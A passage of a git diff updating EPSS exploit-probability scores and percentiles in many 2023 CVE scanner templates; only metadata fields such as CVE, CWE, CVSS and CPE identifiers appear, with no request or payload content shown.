b/http/cves/2023/CVE-2023-27034.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-27034 cwe-id: CWE-89 epss-score: 0.89821 - epss-percentile: 0.99546 + epss-percentile: 0.99548 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index f41cc0bfc83..e9700dcbaa1 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-27159 cwe-id: CWE-918 epss-score: 0.84688 - epss-percentile: 0.99302 + epss-percentile: 0.99301 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index c3d6185b3a1..6f6d65b7628 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-27179 cwe-id: CWE-434 epss-score: 0.86446 - epss-percentile: 0.99387 + epss-percentile: 0.99389 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index fba9d646374..2d8ce088408 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.07744 - epss-percentile: 0.91673 + epss-percentile: 0.91671 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2734.yaml b/http/cves/2023/CVE-2023-2734.yaml index 8798c82e722..7d63855e9ba 100644 --- a/http/cves/2023/CVE-2023-2734.yaml +++ b/http/cves/2023/CVE-2023-2734.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2734 epss-score: 0.60337 - epss-percentile: 0.98208 + epss-percentile: 0.98209 cwe-id: CWE-200 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2023/CVE-2023-27351.yaml b/http/cves/2023/CVE-2023-27351.yaml index 5fc2b824cb3..a227335bd97 100644 --- a/http/cves/2023/CVE-2023-27351.yaml +++ b/http/cves/2023/CVE-2023-27351.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2023-27351 - epss-score: 0.47366 - epss-percentile: 0.97597 + epss-score: 0.46222 + epss-percentile: 0.97545 cwe-id: CWE-287 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*,cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2023/CVE-2023-2745.yaml b/http/cves/2023/CVE-2023-2745.yaml index 2a6803d9181..5da31400124 100644 --- a/http/cves/2023/CVE-2023-2745.yaml +++ b/http/cves/2023/CVE-2023-2745.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.1 cwe-id: CWE-22 epss-score: 0.77784 - epss-percentile: 0.98955 + epss-percentile: 0.98954 metadata: max-request: 3 framework: wordpress diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index e35d24d1c46..24698a0a36f 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -22,8 +22,8 @@ info: cvss-score: 10 cve-id: CVE-2023-27482 cwe-id: CWE-287 - epss-score: 0.87145 - epss-percentile: 0.99421 + epss-score: 0.88566 + epss-percentile: 0.99482 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27584.yaml b/http/cves/2023/CVE-2023-27584.yaml index 0fc306b5fca..89fdc6f1e4b 100644 --- a/http/cves/2023/CVE-2023-27584.yaml +++ b/http/cves/2023/CVE-2023-27584.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-27584 cwe-id: CWE-321 epss-score: 0.64638 - epss-percentile: 0.98395 + epss-percentile: 0.98398 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 642585f458c..a7e898fab13 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-27587 cwe-id: CWE-209 epss-score: 0.86724 - epss-percentile: 0.99397 + epss-percentile: 0.994 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-27624.yaml b/http/cves/2023/CVE-2023-27624.yaml index 0bf1505dac5..2bb6a14a774 100644 --- a/http/cves/2023/CVE-2023-27624.yaml +++ b/http/cves/2023/CVE-2023-27624.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.9 cve-id: CVE-2023-27624 cwe-id: CWE-79 - epss-score: 0.00992 - epss-percentile: 0.76425 + epss-score: 0.00595 + epss-percentile: 0.68718 cpe: cpe:2.3:a:redirect_after_login_project:redirect_after_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml index 2af8e90c7d9..69ff148a1fb 100644 --- a/http/cves/2023/CVE-2023-2779.yaml +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2779 cwe-id: CWE-79 epss-score: 0.31029 - epss-percentile: 0.96597 + epss-percentile: 0.96599 cpe: cpe:2.3:a:heator:social_share\,_social_login_and_social_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 189b74e5c70..1c05893864e 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-27922 cwe-id: CWE-79 epss-score: 0.1122 - epss-percentile: 0.93288 + epss-percentile: 0.93282 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 6b834d12a39..3dcbf925800 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-2796 cwe-id: CWE-862 epss-score: 0.77502 - epss-percentile: 0.98938 + epss-percentile: 0.98937 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index affb148e27f..844dfbe9307 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2813 cwe-id: CWE-79 epss-score: 0.02244 - epss-percentile: 0.84145 + epss-percentile: 0.84141 cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index a3780e08e22..614a2cbfc67 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 - epss-score: 0.93022 - epss-percentile: 0.9977 + epss-score: 0.93074 + epss-percentile: 0.99775 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index e85b5305241..42cc8b1702a 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-28432 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.94113 - epss-percentile: 0.99904 + epss-percentile: 0.99903 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 22ffecfa7bc..459434981fd 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-28665 cwe-id: CWE-79 epss-score: 0.20137 - epss-percentile: 0.95303 + epss-percentile: 0.95305 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 2391518dd25..069cd23b78b 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-29084 cwe-id: CWE-77 epss-score: 0.93878 - epss-percentile: 0.99863 + epss-percentile: 0.99865 cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-29204.yaml b/http/cves/2023/CVE-2023-29204.yaml index a9604ad8673..8a74dd98c98 100644 --- a/http/cves/2023/CVE-2023-29204.yaml +++ b/http/cves/2023/CVE-2023-29204.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-29204 cwe-id: CWE-601 epss-score: 0.09834 - epss-percentile: 0.92747 + epss-percentile: 0.92741 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index ca19b158382..95a28de99b9 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.9429 - epss-percentile: 0.99935 + epss-percentile: 0.99936 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index c8fea15cd45..a84e9c0d4af 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29300 cwe-id: CWE-502 - epss-score: 0.93799 - epss-percentile: 0.9985 + epss-score: 0.93875 + epss-percentile: 0.99863 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 2385f3ae1e1..f543b71c288 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-29489 cwe-id: CWE-79 epss-score: 0.92926 - epss-percentile: 0.99763 + epss-percentile: 0.99762 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29506.yaml b/http/cves/2023/CVE-2023-29506.yaml index 92a3c66c979..cba2c0da48a 100644 --- a/http/cves/2023/CVE-2023-29506.yaml +++ b/http/cves/2023/CVE-2023-29506.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-29506 cwe-id: CWE-79 epss-score: 0.41315 - epss-percentile: 0.97277 + epss-percentile: 0.97275 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 59de174fb8d..3d71e178cb2 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-29623 cwe-id: CWE-79 epss-score: 0.12517 - epss-percentile: 0.93722 + epss-percentile: 0.93719 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index a6a8599620e..f2f5ccb3f33 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-29827 cwe-id: CWE-74 epss-score: 0.80822 - epss-percentile: 0.99105 + epss-percentile: 0.99106 cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 0e47403d374..69f7e311353 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-29887 cwe-id: CWE-22 epss-score: 0.88637 - epss-percentile: 0.99487 + epss-percentile: 0.99486 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 4e40ca46097..b3b80b651c8 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-29923 cwe-id: CWE-276 epss-score: 0.82151 - epss-percentile: 0.99176 + epss-percentile: 0.99178 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30192.yaml b/http/cves/2023/CVE-2023-30192.yaml index 0c04b2dd343..67eb97c66db 100644 --- a/http/cves/2023/CVE-2023-30192.yaml +++ b/http/cves/2023/CVE-2023-30192.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-30192 cwe-id: CWE-89 epss-score: 0.32771 - epss-percentile: 0.96737 + epss-percentile: 0.96738 metadata: verified: true max-request: 2 diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index fdd5ac0b8a3..c4c5497778d 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-30210 cwe-id: CWE-79 epss-score: 0.118 - epss-percentile: 0.93502 + epss-percentile: 0.93495 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 4642a9fb3d8..e5e4088d1ec 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-30212 cwe-id: CWE-79 epss-score: 0.66021 - epss-percentile: 0.98455 + epss-percentile: 0.98457 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index 008be55bdd9..1939a9e0a43 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-30258 cwe-id: CWE-78 epss-score: 0.93708 - epss-percentile: 0.99836 + epss-percentile: 0.99838 cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 8d4dc6a5ef9..bb40cc7553d 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-30534 cwe-id: CWE-502 epss-score: 0.41972 - epss-percentile: 0.97315 + epss-percentile: 0.97312 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index f46d31a467e..c18e58d888c 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3077 - epss-score: 0.40251 - epss-percentile: 0.97219 + epss-score: 0.58815 + epss-percentile: 0.98145 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index e2c17ed7d32..b844722f04d 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-30868 cwe-id: CWE-79 epss-score: 0.47601 - epss-percentile: 0.97606 + epss-percentile: 0.97601 cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30869.yaml b/http/cves/2023/CVE-2023-30869.yaml index 9b6589b754c..9852b460717 100644 --- a/http/cves/2023/CVE-2023-30869.yaml +++ b/http/cves/2023/CVE-2023-30869.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-30869 cwe-id: CWE-287 epss-score: 0.29106 - epss-percentile: 0.96433 + epss-percentile: 0.96438 cpe: cpe:2.3:a:awesomemotive:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index c458ec77e6f..1bdb54cd737 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -21,7 +21,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-31446 epss-score: 0.92671 - epss-percentile: 0.99736 + epss-percentile: 0.99735 cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index 8eb6975065a..dd7645b75c2 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-31465 epss-score: 0.90545 - epss-percentile: 0.99591 + epss-percentile: 0.99589 cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index c874546c47a..15f0e8a5bcb 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-31548 cwe-id: CWE-79 epss-score: 0.19158 - epss-percentile: 0.9515 + epss-percentile: 0.95149 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3188.yaml b/http/cves/2023/CVE-2023-3188.yaml index 08af8577e0b..aef8fc64af0 100644 --- a/http/cves/2023/CVE-2023-3188.yaml +++ b/http/cves/2023/CVE-2023-3188.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3188 cwe-id: CWE-918 epss-score: 0.48696 - epss-percentile: 0.97663 + epss-percentile: 0.97659 cpe: cpe:2.3:a:owncast_project:owncast:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32068.yaml b/http/cves/2023/CVE-2023-32068.yaml index ddcd9cb371d..7d202933c6b 100644 --- a/http/cves/2023/CVE-2023-32068.yaml +++ b/http/cves/2023/CVE-2023-32068.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-32068 cwe-id: CWE-601 epss-score: 0.63377 - epss-percentile: 0.98338 + epss-percentile: 0.9834 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index acfa401f740..3bf0b0cbc8f 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-3219 cwe-id: CWE-639 epss-score: 0.75972 - epss-percentile: 0.98872 + epss-percentile: 0.98871 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index ea0556aee9a..62e17a0d5dd 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-32235 cwe-id: CWE-22 epss-score: 0.94094 - epss-percentile: 0.99902 + epss-percentile: 0.99901 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 0de0d856e0d..cb6bf4b97dc 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 - epss-score: 0.92509 - epss-percentile: 0.99724 + epss-score: 0.92897 + epss-percentile: 0.99759 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-33193.yaml b/http/cves/2023/CVE-2023-33193.yaml index c235968e2d5..de5c5d50dd0 100644 --- a/http/cves/2023/CVE-2023-33193.yaml +++ b/http/cves/2023/CVE-2023-33193.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2023-33193 - epss-score: 0.43629 - epss-percentile: 0.97407 + epss-score: 0.5647 + epss-percentile: 0.98034 cwe-id: CWE-444 cpe: cpe:2.3:a:emby:emby.releases:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 4218ed0dd4d..9cfd76fd6c5 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-33338 cwe-id: CWE-89 epss-score: 0.66882 - epss-percentile: 0.98491 + epss-percentile: 0.98493 cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index 3c4338c5ca4..f75c7f69d14 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-33405 cwe-id: CWE-601 - epss-score: 0.38425 - epss-percentile: 0.97111 + epss-score: 0.43809 + epss-percentile: 0.97412 cpe: cpe:2.3:a:blogengine:blogengine.net:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index a19f2964f36..79dcc1b814d 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-33439 cwe-id: CWE-89 epss-score: 0.33989 - epss-percentile: 0.96835 + epss-percentile: 0.96837 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index fb8ee3f7699..d1d5c6dd86b 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-3345 cwe-id: CWE-200 epss-score: 0.64843 - epss-percentile: 0.98403 + epss-percentile: 0.98405 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index 103afe2e5a2..abc56bd7e07 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3380 cwe-id: CWE-74 - epss-score: 0.47965 - epss-percentile: 0.97623 + epss-score: 0.75416 + epss-percentile: 0.98842 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:*:*:*:*:*:*:*:* metadata: vendor: wavlink diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 7be70f6c4c6..0e405de5279 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-33831 cwe-id: CWE-77 epss-score: 0.93354 - epss-percentile: 0.99802 + epss-percentile: 0.99801 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33960.yaml b/http/cves/2023/CVE-2023-33960.yaml index 4ddddb3e86d..0180dc0ce34 100644 --- a/http/cves/2023/CVE-2023-33960.yaml +++ b/http/cves/2023/CVE-2023-33960.yaml @@ -19,7 +19,7 @@ info: cvss-score: 5.3 cve-id: CVE-2023-33960 epss-score: 0.001 - epss-percentile: 0.28526 + epss-percentile: 0.28478 cwe-id: CWE-200 metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index e339725693a..c4ceac2dc5b 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 epss-score: 0.91038 - epss-percentile: 0.99619 + epss-percentile: 0.99618 cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34133.yaml b/http/cves/2023/CVE-2023-34133.yaml index a9f61588fda..4c14f04b068 100644 --- a/http/cves/2023/CVE-2023-34133.yaml +++ b/http/cves/2023/CVE-2023-34133.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-34133 cwe-id: CWE-89 epss-score: 0.53826 - epss-percentile: 0.97912 + epss-percentile: 0.97909 cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 963199cf5d5..1deb4a0170c 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-34192 cwe-id: CWE-79 epss-score: 0.89435 - epss-percentile: 0.99528 + epss-percentile: 0.9953 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index ffcefc45c86..34e48049d33 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-34537 cwe-id: CWE-79 epss-score: 0.12787 - epss-percentile: 0.93793 + epss-percentile: 0.93789 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index b4f13f8b2b2..a4ecd8732ca 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-34599 cwe-id: CWE-79 epss-score: 0.49308 - epss-percentile: 0.97693 + epss-percentile: 0.97688 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 diff --git 